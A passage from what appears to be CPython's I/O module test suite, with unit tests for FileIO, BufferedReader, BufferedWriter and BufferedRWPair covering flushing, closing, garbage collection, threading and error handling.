self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
